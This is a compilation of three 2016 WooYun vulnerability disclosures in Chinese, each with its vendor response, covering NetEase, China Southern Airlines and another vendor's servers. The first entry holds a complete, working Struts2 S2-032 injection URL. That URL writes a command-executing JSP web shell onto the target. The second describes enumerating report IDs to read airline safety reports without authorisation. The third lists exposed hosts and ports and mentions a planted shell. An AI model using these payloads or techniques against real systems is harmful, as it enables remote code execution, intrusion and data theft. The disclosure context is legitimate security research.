漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：网易某站s2-032命令执行详细说明：存在漏洞的域为：brand.lady.163.comhttp://brand.lady.163.com/cosmetic.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E漏洞证明：直接上效果图吧 修复方案：升级版本版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-29 11:08厂商回复：您好，该通用类型框架漏洞已修复。感谢您对网易产品的关注。最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：南方航空某安全系统可越权访问全部安全事件报告详细说明：http://esms.cs-air.com/main/UserManager-esmsLogin.action南方航空安全管理系统通过在报告奖励发放处修改fwid值可越权查看尚未公布的无权查看的报告，包括最新的尚未处置的报告，由于报告中包含航空安全风险信息有可能对航空安全造成影响。通过遍历fwid值可获取全部报告。漏洞证明：http://esms.cs-air.com/main/UserManager-esmsLogin.action点击航空安全自愿报告进入如下界面，在未登录情况下原本只能访问界面中显示的几条信息，如果点击more会要求登录在已发布自愿报告中修改fwid会显示权限不足但是在年度奖励报告中修改fwid则会显示出报告内容如将有权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=57178改成无权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=74090可以查看新近的报告通过遍历获取了全部报告的ID 修复方案： 版权声明：转载请注明来源 黑骑士@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-06 16:37厂商回复：感谢提醒。最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：最近好可怕.详细说明：220.181.1.217:9001 220.181.1.217:9002 220.181.1.217:9006220.181.1.217:9009220.181.1.223:9009220.181.1.223:9006220.181.1.223:9001220.181.1.223:9002220.181.1.222:9009220.181.1.222:9006220.181.1.222:9001220.181.1.222:9002220.181.1.221:9006220.181.1.221:9001220.181.1.221:9002220.181.1.221:9009220.181.1.219:9006220.181.1.219:9009220.181.1.219:9002220.181.1.219:9001220.181.1.217:9001220.181.1.217:9002220.181.1.217:9006220.181.1.217:9009220.181.1.216:9002220.181.1.216:9001220.181.1.216:9009220.181.1.216:9006漏洞证明： 基本上好像都是root权限能访问然后通过收集到的信息发现了两处命令执行http://10.140.60.128:9912/http://10.154.156.18:8080/jenkins/然后有一个是用tomcat做的容器 就shell了http://10.154.156.18:8080/x.jsp 修复方案：嗯.版权声明：转载请注明来源 scanf@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：16确认时间：2016-04-29 10:12厂商回复：感谢scanf，已通知相关部门。最新状态：暂无